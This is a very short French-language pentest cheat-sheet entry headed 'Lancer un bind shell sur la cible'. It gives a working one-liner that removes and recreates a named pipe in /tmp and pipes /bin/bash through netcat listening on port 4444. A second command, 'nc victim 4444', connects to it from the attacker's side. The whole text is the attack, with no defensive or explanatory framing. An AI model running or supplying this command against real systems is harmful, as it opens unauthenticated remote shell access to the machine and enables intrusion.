Lancer un bind shell sur la cible
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash 2>&1|nc -lp 4444 >/tmp/f
Se connecter avec un nc
nc victim 4444